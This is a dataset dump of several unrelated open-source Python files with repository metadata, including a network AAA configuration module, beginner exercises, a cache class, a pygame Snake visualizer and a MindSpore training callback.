def generate_commands(self):\n tacacs_accounting_enabled = self._required_config.get(\"tacacs_accounting_enabled\")\n if tacacs_accounting_enabled is not None:\n current_accounting_enabled = self._current_config.get(\"tacacs_accounting_enabled\")\n if current_accounting_enabled != tacacs_accounting_enabled:\n if tacacs_accounting_enabled is True:\n self._commands.append('aaa accounting changes default stop-only tacacs+')\n else:\n self._commands.append('no aaa accounting changes default stop-only tacacs+')\n\n auth_default_user = self._required_config.get(\"auth_default_user\")\n if auth_default_user is not None:\n current_user = self._current_config.get(\"auth_default_user\")\n if current_user != auth_default_user:\n self._commands.append('aaa authorization map default-user {0}' .format(auth_default_user))\n\n auth_order = self._required_config.get(\"auth_order\")\n if auth_order is not None:\n current_order = self._current_config.get(\"auth_order\")\n if current_order != auth_order:\n self._commands.append('aaa authorization map order {0}' .format(auth_order))\n\n auth_fallback_enabled = self._required_config.get(\"auth_fallback_enabled\")\n if auth_fallback_enabled is not None:\n current_fallback = self._current_config.get(\"auth_fallback_enabled\")\n if current_fallback != auth_fallback_enabled:\n if auth_fallback_enabled is True:\n self._commands.append('aaa authorization map fallback server-err')\n else:\n self._commands.append('no aaa authorization map fallback server-err')\n\n\ndef main():\n \"\"\" main entry point for module execution\n \"\"\"\n OnyxAAAModule.main()\n\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":36.6770186335,"string":"36.677019"},"max_line_length":{"kind":"number","value":106,"string":"106"},"alphanum_fraction":{"kind":"number","value":0.682641829,"string":"0.682642"}}},{"rowIdx":46370,"cells":{"hexsha":{"kind":"string","value":"e804af1034061f2f104d2ffe58eec14a7bc29868"},"size":{"kind":"number","value":88,"string":"88"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 26/26.py"},"max_stars_repo_name":{"kind":"string","value":"jaswinder9051998/Resources"},"max_stars_repo_head_hexsha":{"kind":"string","value":"fd468af37bf24ca57555d153ee64693c018e822e"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":101,"string":"101"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-12-20T11:57:11.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-23T09:49:13.000Z"},"max_issues_repo_path":{"kind":"string","value":"50-Python-Exercises/Exercises/Exercise 26/26.py"},"max_issues_repo_name":{"kind":"string","value":"kuwarkapur/Hacktoberfest-2022"},"max_issues_repo_head_hexsha":{"kind":"string","value":"efaafeba5ce51d8d2e2d94c6326cc20bff946f17"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":4,"string":"4"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2022-01-12T11:55:56.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-12T04:53:33.000Z"},"max_forks_repo_path":{"kind":"string","value":"50-Python-Exercises/Exercises/Exercise 26/26.py"},"max_forks_repo_name":{"kind":"string","value":"kuwarkapur/Hacktoberfest-2022"},"max_forks_repo_head_hexsha":{"kind":"string","value":"efaafeba5ce51d8d2e2d94c6326cc20bff946f17"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":38,"string":"38"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2022-01-12T11:56:16.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-23T10:07:52.000Z"},"content":{"kind":"string","value":"#Make a script that prints out numbers from 1 to 10\n\nfor i in range(1,11):\n print(i)\n"},"avg_line_length":{"kind":"number","value":17.6,"string":"17.6"},"max_line_length":{"kind":"number","value":51,"string":"51"},"alphanum_fraction":{"kind":"number","value":0.6818181818,"string":"0.681818"}}},{"rowIdx":46371,"cells":{"hexsha":{"kind":"string","value":"e826dce0a2efec3777ab49d67c529dd9c42675ca"},"size":{"kind":"number","value":2811,"string":"2,811"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py"},"max_stars_repo_name":{"kind":"string","value":"Indexical-Metrics-Measure-Advisory/watchmen"},"max_stars_repo_head_hexsha":{"kind":"string","value":"c54ec54d9f91034a38e51fd339ba66453d2c7a6d"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py"},"max_issues_repo_name":{"kind":"string","value":"Indexical-Metrics-Measure-Advisory/watchmen"},"max_issues_repo_head_hexsha":{"kind":"string","value":"c54ec54d9f91034a38e51fd339ba66453d2c7a6d"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"packages/watchmen-data-kernel/src/watchmen_data_kernel/cache/topic_cache.py"},"max_forks_repo_name":{"kind":"string","value":"Indexical-Metrics-Measure-Advisory/watchmen"},"max_forks_repo_head_hexsha":{"kind":"string","value":"c54ec54d9f91034a38e51fd339ba66453d2c7a6d"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from typing import List, Optional\n\nfrom watchmen_data_kernel.storage import TopicDataEntityHelper\nfrom watchmen_data_kernel.topic_schema import TopicSchema\nfrom watchmen_model.admin import Topic\nfrom watchmen_model.common import TenantId, TopicId\nfrom .cache_manager import get_topic_by_id_cache, get_topic_by_tenant_and_name_cache, \\\n\tget_topic_entity_helper_by_id_cache, get_topic_schema_by_id_cache\nfrom .internal_cache import InternalCache\nfrom .pipeline_by_topic_cache import pipeline_by_topic_cache\n\n\nclass TopicCache:\n\tdef __init__(self):\n\t\tself.byIdCache = InternalCache(cache=get_topic_by_id_cache)\n\t\tself.byTenantAndNameCache = InternalCache(cache=get_topic_by_tenant_and_name_cache)\n\t\tself.schemaByIdCache = InternalCache(cache=get_topic_schema_by_id_cache)\n\t\tself.entityHelperByIdCache = InternalCache(cache=get_topic_entity_helper_by_id_cache)\n\n\t# noinspection PyMethodMayBeStatic\n\tdef to_tenant_and_name_key(self, name: str, tenant_id: TenantId) -> str:\n\t\treturn f'{tenant_id}-{name}'\n\n\tdef put(self, topic: Topic) -> Optional[Topic]:\n\t\t# topic is changed, remove from entity helper cache anyway\n\t\tself.entityHelperByIdCache.remove(topic.topicId)\n\t\t# refresh other caches\n\t\texisting_topic = self.byIdCache.put(topic.topicId, topic)\n\t\tself.byTenantAndNameCache.put(\n\t\t\tself.to_tenant_and_name_key(topic.name, topic.tenantId), topic)\n\t\tself.schemaByIdCache.put(topic.topicId, TopicSchema(topic))\n\t\treturn existing_topic\n\n\tdef put_entity_helper(self, entity_helper: TopicDataEntityHelper) -> Optional[TopicDataEntityHelper]:\n\t\treturn self.entityHelperByIdCache.put(entity_helper.get_topic().topicId, entity_helper)\n\n\tdef get(self, topic_id: TopicId) -> Optional[Topic]:\n\t\treturn self.byIdCache.get(topic_id)\n\n\tdef get_schema(self, topic_id: TopicId) -> Optional[TopicSchema]:\n\t\treturn self.schemaByIdCache.get(topic_id)\n\n\tdef get_entity_helper(self, topic_id: TopicId) -> Optional[TopicDataEntityHelper]:\n\t\treturn self.entityHelperByIdCache.get(topic_id)\n\n\tdef get_by_name(self, name: str, tenant_id: TenantId) -> Optional[Topic]:\n\t\treturn self.byTenantAndNameCache.get(self.to_tenant_and_name_key(name, tenant_id))\n\n\tdef remove(self, topic_id: TopicId) -> Optional[Topic]:\n\t\texisting: Optional[Topic] = self.byIdCache.remove(topic_id)\n\t\tif existing is not None:\n\t\t\tpipeline_by_topic_cache.remove(topic_id)\n\t\t\tself.byTenantAndNameCache.remove(self.to_tenant_and_name_key(existing.name, existing.tenantId))\n\t\tself.schemaByIdCache.remove(topic_id)\n\t\tself.entityHelperByIdCache.remove(topic_id)\n\t\treturn existing\n\n\tdef all(self) -> List[Topic]:\n\t\treturn list(self.byIdCache.values())\n\n\tdef clear(self) -> None:\n\t\tself.byIdCache.clear()\n\t\tself.byTenantAndNameCache.clear()\n\t\tself.schemaByIdCache.clear()\n\t\tself.entityHelperByIdCache.clear()\n\t\tpipeline_by_topic_cache.clear()\n\n\ntopic_cache = TopicCache()\n"},"avg_line_length":{"kind":"number","value":40.1571428571,"string":"40.157143"},"max_line_length":{"kind":"number","value":102,"string":"102"},"alphanum_fraction":{"kind":"number","value":0.8118107435,"string":"0.811811"}}},{"rowIdx":46372,"cells":{"hexsha":{"kind":"string","value":"c7742d037fbfa87807fd9419663afe8f98d4b927"},"size":{"kind":"number","value":1087,"string":"1,087"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Beginner/03. Python/remove_duplicates.py"},"max_stars_repo_name":{"kind":"string","value":"ankita080208/Hacktoberfest"},"max_stars_repo_head_hexsha":{"kind":"string","value":"2be849e89285260e7b6672f42979943ad6bbec78"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":3,"string":"3"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-03-16T16:44:04.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-06-07T17:32:51.000Z"},"max_issues_repo_path":{"kind":"string","value":"Beginner/03. Python/remove_duplicates.py"},"max_issues_repo_name":{"kind":"string","value":"ankita080208/Hacktoberfest"},"max_issues_repo_head_hexsha":{"kind":"string","value":"2be849e89285260e7b6672f42979943ad6bbec78"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Beginner/03. Python/remove_duplicates.py"},"max_forks_repo_name":{"kind":"string","value":"ankita080208/Hacktoberfest"},"max_forks_repo_head_hexsha":{"kind":"string","value":"2be849e89285260e7b6672f42979943ad6bbec78"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-10-26T08:44:01.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2020-10-26T08:44:01.000Z"},"content":{"kind":"string","value":"'''\nGiven an input of a 2D array of integers, removes all duplicates from the array.\nEmpty sub-arrays are removed.\n'''\nmap = {}\n\ndef remove_duplicates(all_nums):\n end_index = len(all_nums) #length of all_nums\n i = 0 #current index of all_nums\n while(i < end_index):\n j = 0 #current index of sub-array\n sub_arr = all_nums[i]\n sub_end = len(sub_arr)\n while(j < sub_end):\n if(map.get(sub_arr[j]) != None):\n sub_end = sub_end - 1 #decrease length of sub_arr due removal\n sub_arr.remove(sub_arr[j])\n if(len(all_nums[i]) == 0):\n end_index = end_index - 1 #decrease length of all_nums due to empty array removal\n all_nums.remove(all_nums[i])\n i = i - 1\n continue\n else:\n print(\"No\",sub_arr[j],\"found in map.\")\n map[sub_arr[j]] = 1\n j = j + 1\n i = i + 1\n\n print(all_nums)\n\narr = [[1, 2], [2, 2, 2, 2, 2], [2, 3], [4, 5, 2, 2, 2], [3, 3, 3, 4]]\n\nremove_duplicates(arr)\n"},"avg_line_length":{"kind":"number","value":31.9705882353,"string":"31.970588"},"max_line_length":{"kind":"number","value":101,"string":"101"},"alphanum_fraction":{"kind":"number","value":0.5225390984,"string":"0.522539"}}},{"rowIdx":46373,"cells":{"hexsha":{"kind":"string","value":"1bfcbe98a563233e76cce2f48c46d13e30ac670b"},"size":{"kind":"number","value":5222,"string":"5,222"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"code/snake/Visualization.py"},"max_stars_repo_name":{"kind":"string","value":"BogyMitutoyoCTL/AI-Preparation"},"max_stars_repo_head_hexsha":{"kind":"string","value":"ef535741816b02e5e63d426a3232a688c9abd726"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2020-03-30T09:25:53.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2020-03-30T09:25:53.000Z"},"max_issues_repo_path":{"kind":"string","value":"code/snake/Visualization.py"},"max_issues_repo_name":{"kind":"string","value":"BogyMitutoyoCTL/AI-Preparation"},"max_issues_repo_head_hexsha":{"kind":"string","value":"ef535741816b02e5e63d426a3232a688c9abd726"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":2,"string":"2"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2020-02-05T14:00:23.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2020-03-30T19:57:19.000Z"},"max_forks_repo_path":{"kind":"string","value":"code/snake/Visualization.py"},"max_forks_repo_name":{"kind":"string","value":"BogyMitutoyoCTL/AI-Preparation"},"max_forks_repo_head_hexsha":{"kind":"string","value":"ef535741816b02e5e63d426a3232a688c9abd726"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import pygame\n\nfrom GameData import GameData\nfrom TrainingData import TrainingData\nfrom Field import Field\n\n\nclass Visualization:\n def __init__(self, pixel_size: int, field: Field):\n self.current_print_y: int = 0\n\n # PyGame stuff\n pygame.init()\n pygame.fastevent.init()\n self.clock = pygame.time.Clock()\n\n # Arbitrary decisions\n self._pixel_width: int = pixel_size\n self._pixel_height: int = pixel_size\n\n # Prepare something to show\n self.field: Field = field\n self.window = pygame.display.set_mode((field.width * pixel_size + 380, field.height * pixel_size + 40))\n pygame.display.set_caption('AI Snake @mitutoyoctlg')\n self.font_style = pygame.font.SysFont(\"Arial\", 16)\n self.field_position: tuple = (315, 15)\n self.text_color: list = [255, 255, 255]\n\n # Cache\n self.last_field = None\n\n def tick(self) -> None:\n self.clock.tick(0)\n pygame.display.flip()\n\n def reset(self):\n self.current_print_y = 5\n\n def _draw_field(self, field: Field, offset=0):\n if self.last_field is None:\n self.last_field = Field(field.width, field.height)\n self.last_field.set_all_pixels_to([-1, -1, -1]) # ensures a repaint\n pygame.draw.rect(self.window, [50, 50, 50],\n pygame.Rect(self.field_position[0], self.field_position[1],\n field.width * self._pixel_width, field.height * self._pixel_height))\n\n sizechange = 1 if offset > 0 else 0\n for y in range(0, field.height):\n for x in range(0, field.width):\n pixel_color = field.field[y][x]\n if offset == 0:\n if pixel_color == self.last_field.field[y][x]:\n continue\n left = (x - offset) * self._pixel_width + self.field_position[0] + 1 + sizechange * 5\n top = (y - offset) * self._pixel_height + self.field_position[1] + 1 + sizechange * 5\n width = self._pixel_width - 2 - sizechange * 10\n height = self._pixel_height - 2 - sizechange * 10\n pygame.draw.rect(self.window, pixel_color, pygame.Rect(left, top, width, height))\n\n # remember the pixel if original field\n if offset == 0:\n self.last_field.field[y][x] = pixel_color\n\n def display_visualization_stats(self):\n self.text_color = [0, 255, 0]\n fps = int(self.clock.get_fps())\n self._print_in_window(f\"{fps} fps\")\n self._print_in_window(\"\")\n\n def display_training(self, training: TrainingData):\n if training is None:\n return\n self.text_color = [0, 255, 255]\n self._print_in_window(f\"Epoch: {training.epoch} / {training.max_epochs}\")\n self._print_in_window(f\"Steps walked: {training.number_of_steps_walked} / {training.max_number_of_steps}\")\n self._print_in_window(f\"Best score (snake length): {training.best_score}\")\n self._print_in_window(f\"Best steps walked: {training.best_steps_walked}\")\n self._print_in_window(f\"Total training steps (all epochs): {training.total_steps_walked}\")\n self._print_in_window(f\"Total food eaten (all epochs): {training.total_food_eaten}\")\n self._print_in_window(f\"Average food eaten (all epochs): {round((training.total_food_eaten / training.epoch) * 1000) / 1000}\")\n self._print_in_window(f\"ε : {int(training.epsilon * 100)}%\")\n self._print_in_window(\"\")\n\n def display_game(self, info: GameData):\n self.text_color = [128, 128, 255]\n self._print_in_window(f\"Snake direction: {info.direction}\")\n self._print_in_window(f\"Snake head: {info.head_x} , {info.head_y}\")\n self._print_in_window(f\"Snake length (score): {info.snake_length}\")\n self._print_in_window(f\"\")\n self._print_in_window(f\"Food position: {info.food_x} , {info.food_y}\")\n self._print_in_window(f\"Food direction: {info.food_direction}\")\n self._print_in_window(f\"Distance to food in steps: {info.food_distance_in_steps}\")\n self._print_in_window(f\"Air-line distance to food: {info.air_line_distance}\")\n self._print_in_window(f\"\")\n self._print_in_window(f\"Wall distances:\")\n self._print_in_window(f\" {info.walldistance_n}\")\n self._print_in_window(f\"{info.walldistance_w} {info.walldistance_e}\")\n self._print_in_window(f\" {info.walldistance_s}\")\n self._print_in_window(f\"Distance to closest wall: {info.nearest_wall_distance}\")\n self._print_in_window(f\"Distance to wall in walking direction: {info.distance_to_wall_in_current_direction}\")\n self._print_in_window(\"\")\n self._draw_field(info.field)\n\n def _print_in_window(self, text: str) -> None:\n line_distance = 16\n self.current_print_y += line_distance\n pixels = self.font_style.render(text + \" \", True, self.text_color, [0, 0, 0])\n self.window.blit(pixels, [5, self.current_print_y])\n\n def add_layer(self, visualization_field):\n if visualization_field is not None:\n self._draw_field(visualization_field, 1)\n"},"avg_line_length":{"kind":"number","value":46.2123893805,"string":"46.212389"},"max_line_length":{"kind":"number","value":134,"string":"134"},"alphanum_fraction":{"kind":"number","value":0.6346227499,"string":"0.634623"}}},{"rowIdx":46374,"cells":{"hexsha":{"kind":"string","value":"d3c0698c06fb8aa6e7f973e111326d1789b2d201"},"size":{"kind":"number","value":308,"string":"308"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py"},"max_stars_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_stars_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py"},"max_issues_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_issues_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py"},"max_forks_repo_name":{"kind":"string","value":"eengineergz/Lambda"},"max_forks_repo_head_hexsha":{"kind":"string","value":"1fe511f7ef550aed998b75c18a432abf6ab41c5f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-11-05T07:48:26.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2021-11-05T07:48:26.000Z"},"content":{"kind":"string","value":"# This is to find the sum of digits of a number until it is a single digit\n\ndef sum_of_digits(n):\n n = int(input()) # here n is the number\n if n % 9 != 0:\n print(n % 9)\n else:\n print(\"9\")\n \n# This method reduces time complexity by a factor of n and also without using any loop\n\n"},"avg_line_length":{"kind":"number","value":25.6666666667,"string":"25.666667"},"max_line_length":{"kind":"number","value":86,"string":"86"},"alphanum_fraction":{"kind":"number","value":0.6136363636,"string":"0.613636"}}},{"rowIdx":46375,"cells":{"hexsha":{"kind":"string","value":"d3c1e06d5da6a9eccf9d261778767e37808ed7c6"},"size":{"kind":"number","value":4474,"string":"4,474"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"official/cv/vit/src/callback.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"official/cv/vit/src/callback.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"official/cv/vit/src/callback.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"callbacks\"\"\"\n\nimport time\nimport numpy as np\nfrom mindspore.train.callback import Callback\nfrom mindspore.common.tensor import Tensor\n\nclass StateMonitor(Callback):\n \"\"\"StateMonitor\"\"\"\n def __init__(self, data_size, tot_batch_size=None, lrs=None,\n eval_interval=None, eval_offset=None, eval_engine=None, logger=None):\n super(StateMonitor, self).__init__()\n self.data_size = data_size\n self.tot_batch_size = tot_batch_size\n self.lrs = lrs\n self.epoch_num = 0\n self.loss = 0\n self.eval_interval = eval_interval\n self.eval_offset = eval_offset\n self.eval_engine = eval_engine\n self.best_acc = -1\n self.best_acc_top5 = -1\n self.best_i2t_recall = -1\n self.best_t2i_recall = -1\n self.mean_fps = 0.0\n self.print = print\n if logger is not None:\n self.print = logger\n\n\n def step_end(self, run_context):\n cb_params = run_context.original_args()\n loss = cb_params.net_outputs\n\n if isinstance(loss, (tuple, list)):\n if isinstance(loss[0], Tensor) and isinstance(loss[0].asnumpy(), np.ndarray):\n loss = loss[0]\n\n if isinstance(loss, Tensor) and isinstance(loss.asnumpy(), np.ndarray):\n loss = np.mean(loss.asnumpy())\n\n self.loss = loss\n\n def epoch_begin(self, run_context):\n self.epoch_time = time.time()\n\n def epoch_end(self, run_context):\n epoch_seconds = (time.time() - self.epoch_time)\n per_step_seconds = epoch_seconds / self.data_size\n\n print_str = \"epoch[{}]\".format(self.epoch_num)\n print_str += ', epoch time: {:.2f}s'.format(epoch_seconds)\n print_str += ', per step time: {:.4f}s'.format(per_step_seconds)\n print_str += ', loss={:.6f}'.format(self.loss)\n\n if self.lrs is not None:\n lr = self.lrs[(self.epoch_num + 1) * self.data_size - 1]\n print_str += ', lr={:.6f}'.format(lr)\n\n if self.tot_batch_size is not None:\n fps = self.tot_batch_size * self.data_size / epoch_seconds\n self.mean_fps = (self.mean_fps * self.epoch_num + fps) / (self.epoch_num + 1)\n print_str += ', fps={:.2f}'.format(fps)\n\n if (self.epoch_num + 1) % self.eval_interval == self.eval_offset:\n eval_start = time.time()\n self.eval_engine.eval()\n output = self.eval_engine.get_result()\n eval_seconds = time.time() - eval_start\n if output is not None:\n if isinstance(output, list):\n print_str += ', top1 accuracy={:.6f}'.format(float(output[0]))\n print_str += ', top5 accuracy={:.6f}'.format(float(output[1]))\n print_str += ', i2t_recall={:.6f}'.format(float(output[2]))\n print_str += ', t2i_recall={:.6f}'.format(float(output[3]))\n print_str += ', eval_cost={:.2f}'.format(eval_seconds)\n\n if float(output[0]) > self.best_acc:\n self.best_acc = float(output[0])\n if float(output[1]) > self.best_acc_top5:\n self.best_acc_top5 = float(output[1])\n if float(output[2]) > self.best_i2t_recall:\n self.best_i2t_recall = float(output[2])\n if float(output[3]) > self.best_t2i_recall:\n self.best_t2i_recall = float(output[3])\n else:\n print_str += ', accuracy={:.6f}'.format(float(output))\n print_str += ', eval_cost={:.2f}'.format(eval_seconds)\n\n if float(output) > self.best_acc:\n self.best_acc = float(output)\n\n self.print(print_str)\n self.epoch_num += 1\n"},"avg_line_length":{"kind":"number","value":41.0458715596,"string":"41.045872"},"max_line_length":{"kind":"number","value":89,"string":"89"},"alphanum_fraction":{"kind":"number","value":0.5827000447,"string":"0.5827"}}},{"rowIdx":46376,"cells":{"hexsha":{"kind":"string","value":"d3d107629e018d079de059c29b5b2649cece9a04"},"size":{"kind":"number","value":21159,"string":"21,159"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py"},"max_stars_repo_name":{"kind":"string","value":"uruzahe/carla"},"max_stars_repo_head_hexsha":{"kind":"string","value":"940c2ab23cce1eda1ef66de35f66b42d40865fb1"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":4,"string":"4"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2020-11-13T02:35:56.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-03-29T20:15:54.000Z"},"max_issues_repo_path":{"kind":"string","value":"Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py"},"max_issues_repo_name":{"kind":"string","value":"uruzahe/carla"},"max_issues_repo_head_hexsha":{"kind":"string","value":"940c2ab23cce1eda1ef66de35f66b42d40865fb1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":9,"string":"9"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2020-12-09T02:12:39.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2021-02-18T00:15:28.000Z"},"max_forks_repo_path":{"kind":"string","value":"Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py"},"max_forks_repo_name":{"kind":"string","value":"uruzahe/carla"},"max_forks_repo_head_hexsha":{"kind":"string","value":"940c2ab23cce1eda1ef66de35f66b42d40865fb1"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-11-20T19:31:26.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2020-11-20T19:31:26.000Z"},"content":{"kind":"string","value":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo\n# Copyright (C) 2010-2020 German Aerospace Center (DLR) and others.\n# This program and the accompanying materials are made available under the\n# terms of the Eclipse Public License 2.0 which is available at\n# https://www.eclipse.org/legal/epl-2.0/\n# This Source Code may also be made available under the following Secondary\n# Licenses when the conditions for such availability set forth in the Eclipse\n# Public License 2.0 are satisfied: GNU General Public License, version 2\n# or later which is available at\n# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html\n# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later\n\n# @file runner.py\n# @author Michael Behrisch\n# @author Jakob Erdmann\n# @date 2010-01-30\n\n\"\"\"\nThis script runs the 